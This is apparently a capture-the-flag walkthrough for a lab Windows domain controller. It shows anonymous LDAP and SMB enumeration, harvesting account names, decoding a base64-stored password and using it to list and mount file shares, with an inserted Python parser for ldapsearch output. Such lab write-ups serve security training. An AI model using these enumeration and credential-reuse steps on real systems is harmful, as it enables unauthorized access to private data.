➜ ldap smbclient -L //10.10.10.182/
Password for [WORKGROUP\nakul]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.182 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
ldapsearch -H ldap://10.10.10.182 -x -s base namingcontexts > ldap.out
ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=Person)' > ldapseachObjectClass.out
I found potential usernames.
➜ ldap cat ldapseachObjectClass.out | grep sAMAccountName:
sAMAccountName: CascGuest
sAMAccountName: CASC-DC1$
sAMAccountName: arksvc
sAMAccountName: s.smith
sAMAccountName: r.thompson
sAMAccountName: util
sAMAccountName: j.wakefield
sAMAccountName: s.hickson
sAMAccountName: j.goodhand
sAMAccountName: a.turnbull
sAMAccountName: e.crowe
sAMAccountName: b.hanson
sAMAccountName: d.burman
sAMAccountName: BackupSvc
sAMAccountName: j.allen
sAMAccountName: i.croft
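To audit what an anonymous bind like the one above exposes, it helps to parse the ldapsearch output properly instead of grepping it: LDIF folds long values onto continuation lines (a leading space) and emits non-printable or non-ASCII values as base64 with a `::` separator, both of which a plain `grep` misses. The following parser is an added example, not part of the original writeup; the LDIF in `SAMPLE_LDIF` is constructed for the demo and is not the real dump from the box.

```python
import base64
import re

# Constructed sample of ldapsearch LDIF output (not the page's real dump).
# It contains a folded, base64-encoded attribute to exercise both LDIF features.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=cascade,DC=local> with scope subtree
# filter: (objectClass=Person)

# CascGuest, Users, cascade.local
dn: CN=CascGuest,CN=Users,DC=cascade,DC=local
objectClass: top
objectClass: person
cn: CascGuest
sAMAccountName: CascGuest

# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: person
cn: Ryan Thompson
description:: VGVzdCB2
 YWx1ZQ==
sAMAccountName: r.thompson

# search result
search: 2
result: 0 Success
"""

# attribute name, ':' or '::' separator, optional space, value
_ATTR_RE = re.compile(r"^([A-Za-z][\w;.-]*)(::?) ?(.*)$")


def parse_ldif(text):
    """Parse LDIF text into a list of {attribute: [values]} dicts, one per entry.

    Only blocks that carry a 'dn' attribute are returned, which drops the
    trailing 'search:/result:' summary ldapsearch appends.
    """
    # Unfold continuation lines: a line starting with a single space
    # continues the previous logical line.
    unfolded = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:
            unfolded[-1] += raw[1:]
        else:
            unfolded.append(raw)

    entries, current = [], {}
    for line in unfolded:
        if not line.strip():            # blank line ends an entry
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):        # LDIF comment
            continue
        m = _ATTR_RE.match(line)
        if not m:
            continue
        attr, sep, value = m.groups()
        if sep == "::":                 # '::' marks a base64-encoded value
            value = base64.b64decode(value).decode("utf-8", errors="replace")
        current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    return [e for e in entries if "dn" in e]


def account_names(entries):
    """Return the sAMAccountName of every entry that has one."""
    return [e["sAMAccountName"][0] for e in entries if "sAMAccountName" in e]


if __name__ == "__main__":
    for entry in parse_ldif(SAMPLE_LDIF):
        print(entry["dn"][0])
        for attr, values in entry.items():
            if attr != "dn":
                print(f"  {attr}: {values}")
    print("accounts:", account_names(parse_ldif(SAMPLE_LDIF)))
```

Run it against a real dump with `parse_ldif(open("ldapseachObjectClass.out").read())`; the decoded `::` attributes are the ones worth reviewing, since that is where free-text fields that were never meant for anonymous readers tend to surface.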
Also, when reading the SMB file, I found a password that was base64-encoded.
➜ ldap echo 'clk0bjVldmE=' | base64 -d
rY4n5eva
➜ ldap smbclient -L //10.10.10.182/ -U "r.thompson@cascade.local%rY4n5eva"
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Audit$ Disk
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
I was able to read the contents of the Data share.
➜ ldap smbclient //10.10.10.182/Data -U "r.thompson@cascade.local%rY4n5eva"
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 27 08:57:34 2020
.. D 0 Mon Jan 27 08:57:34 2020
Contractors D 0 Mon Jan 13 07:15:11 2020
Finance D 0 Mon Jan 13 07:15:06 2020
IT D 0 Tue Jan 28 23:34:51 2020
Production D 0 Mon Jan 13 07:15:18 2020
Temps D 0 Mon Jan 13 07:15:15 2020
6553343 blocks of size 4096. 1625363 blocks available
smb: \>
Mounted the share on /mnt
sudo mount -t cifs //10.10.10.182/Data /mnt/htb/cascade -o username=r.thompson,password=rY4n5eva